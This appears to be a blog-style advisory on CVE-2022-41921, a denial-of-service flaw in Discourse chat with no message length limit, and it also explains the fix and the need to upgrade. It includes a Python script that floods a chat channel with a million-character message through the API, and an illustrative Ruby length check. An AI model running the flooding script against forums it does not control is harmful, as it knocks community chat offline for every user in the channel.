Discourse is a super popular open-source platform that powers discussion forums for communities all around the world. It’s the backbone behind everything from hobbyist message boards to official company Q&As. But back in 2022, a pretty serious bug surfaced—one that put the reliability of all that chat in danger. This is the story of CVE-2022-41921, and it’s all about chat messages… with no size limit.
Let’s break down this security issue so you understand why it’s a big deal, how it works, and what you—or your sysadmin—should do about it.
What Is CVE-2022-41921?
CVE-2022-41921 is a denial of service (DoS) vulnerability in Discourse's chat feature, affecting versions prior to 2.9.0.beta13. The server enforced no limit on the length of a chat message, so a user could post a word, a paragraph, or millions of characters in a single message.
That sounds harmless at first, but a single huge message has to be stored, pushed to every client in the channel, and rendered by each of their browsers. Browsers can become unresponsive trying to render megabytes of text, the server does that delivery work once per recipient, and the channel becomes unusable for everyone in it: a textbook denial of service.
Why Is Unlimited Chat Message Length Bad?
Imagine someone pasting a novel into a chat, or worse, a script that repeats a character millions of times. When Discourse tries to deliver that message to everyone:
- Other users can see the channel stall, lose their place in the conversation, or have the browser tab become unresponsive.
- Bots or trolls can automate the abuse, posting huge messages repeatedly to keep the channel out of action.
Before the patch, *nothing* stopped someone from doing this on any Discourse site. All it took was a giant paste and a click.
How to Exploit CVE-2022-41921 (for Awareness)
Warning: Only test this on your own systems and never on any site you do not own or have explicit permission to test.
1. Go to a Discourse site with chat enabled, running a version prior to 2.9.0.beta13, that you are authorized to test.
2. Paste a massive chunk of text into the chat box. (A million characters is easy for a script or a quick copy-paste.)
Here is a Python script showing how an attacker could automate this abuse through the Discourse API, bypassing the web UI entirely:
```python
import requests

# Replace these variables with your forum's values
DISCOURSE_URL = "https://your-discourse-site.com"
API_KEY = "your_api_key"
API_USERNAME = "your_username"
CHAT_CHANNEL_ID = 1  # Update as needed

# Build a giant message: one million 'A's (about 1 MB of text)
huge_message = "A" * 1_000_000

# Chat API route as used in this write-up; chat routes have changed across
# Discourse versions, so confirm the path against your own install's routes.
endpoint = f"{DISCOURSE_URL}/chat/api/channels/{CHAT_CHANNEL_ID}/messages"

# Discourse API authentication is carried in these two headers
headers = {
    "Api-Key": API_KEY,
    "Api-Username": API_USERNAME,
    "Content-Type": "application/json",
}
data = {"message": huge_message}

# One request is all it takes on an unpatched server
response = requests.post(endpoint, json=data, headers=headers, timeout=30)
print(response.status_code)
print(response.text)
```
> Result: On an unpatched server the message is accepted and broadcast, and every client in the channel has to render it; tabs can become unresponsive and the channel is effectively unusable until the message is removed.
How Discourse Fixed It
The official patch introduced a *chat message length limit*, shipped in 2.9.0.beta13. Anything longer is rejected on the server before it is stored or broadcast. If you try the script above against a patched server, the request fails with an error saying the message is too long.
No workarounds existed before the patch: admins had to *upgrade* to 2.9.0.beta13 or later. If you are still running an older Discourse with chat enabled, you are still exposed.
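To make the fix concrete, here is an added example (not Discourse's own code) of the kind of server-side check the patch introduced, written in Ruby since Discourse is a Rails application. The 12,000-character limit, the class and function names, and the shape of the simulated endpoint response are assumptions for illustration. The point it demonstrates is that the check must run on the server, counting characters rather than bytes, before the message is stored or broadcast, so that a client that skips the web UI (like the API script above) is rejected just the same.

```ruby
# Added example, not Discourse's own code: a server-side chat message length
# check of the kind the fix introduced. The limit, class names and response
# shape are assumed for illustration.
MAX_CHAT_MESSAGE_LENGTH = 12_000

class ChatMessageTooLong < StandardError; end

# Validate a chat message body before it is stored or broadcast.
# Returns the trimmed body on success; raises on an empty or oversized message.
# Length is counted in characters (String#length), not bytes, so a message made
# of multibyte characters is judged the same way as an ASCII one.
def validate_chat_message!(message, max_length: MAX_CHAT_MESSAGE_LENGTH)
  raise ArgumentError, "message must be a String" unless message.is_a?(String)
  body = message.strip
  raise ArgumentError, "message is empty" if body.empty?
  if body.length > max_length
    raise ChatMessageTooLong,
          "message is #{body.length} characters, limit is #{max_length}"
  end
  body
end

# Simulates the create-message endpoint. Because the check runs here on the
# server, a client that bypasses the UI (as the API script above does) is still
# rejected. Returns [http_status, response_hash]; nothing is stored for a
# rejected message, so the oversized body is never broadcast to other users.
def handle_create_message(params, store: [], max_length: MAX_CHAT_MESSAGE_LENGTH)
  body = validate_chat_message!(params.fetch("message", ""), max_length: max_length)
  store << body
  [200, { "message" => { "id" => store.length, "length" => body.length } }]
rescue ChatMessageTooLong, ArgumentError => e
  [422, { "errors" => [e.message] }]
end

if __FILE__ == $PROGRAM_NAME
  store = []
  normal = handle_create_message({ "message" => "hello" }, store: store)
  huge = handle_create_message({ "message" => "A" * 1_000_000 }, store: store)
  puts "normal message:         #{normal.inspect}"
  puts "1,000,000-char message: #{huge.inspect}"
  puts "messages stored:        #{store.length}"
end
```

Running the file posts one normal message and one million-character message: the first is stored and answered with 200, the second is refused with a 422 and an error naming the limit, and the store still holds only the first message. A client-side `maxlength` on the chat box is fine as a usability hint, but it is not a defence; the request in the Python script never touches the UI.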
If you run a Discourse server
- Upgrade to 2.9.0.beta13 or later as soon as possible; there is no configuration workaround on older versions.
If you’re a regular user
- Alert your site admin to this vulnerability if your forum feels slow, crashes, or you see giant (maybe spammy) messages.
References and More Reading
- CVE record on NVD
- Discourse security advisory on GitHub
- Official Discourse changelog
Conclusion
CVE-2022-41921 might sound simple—just a missing message size check—but it’s a classic lesson that little oversights can cause huge security headaches. Unlimited chat message length can easily ruin the chat experience (or worse) for *everyone*. The fix is easy: update your Discourse! Protect your forum and keep the conversations flowing… safely.
Timeline
Published on: 11/28/2022 15:15:00 UTC
Last modified on: 12/01/2022 20:20:00 UTC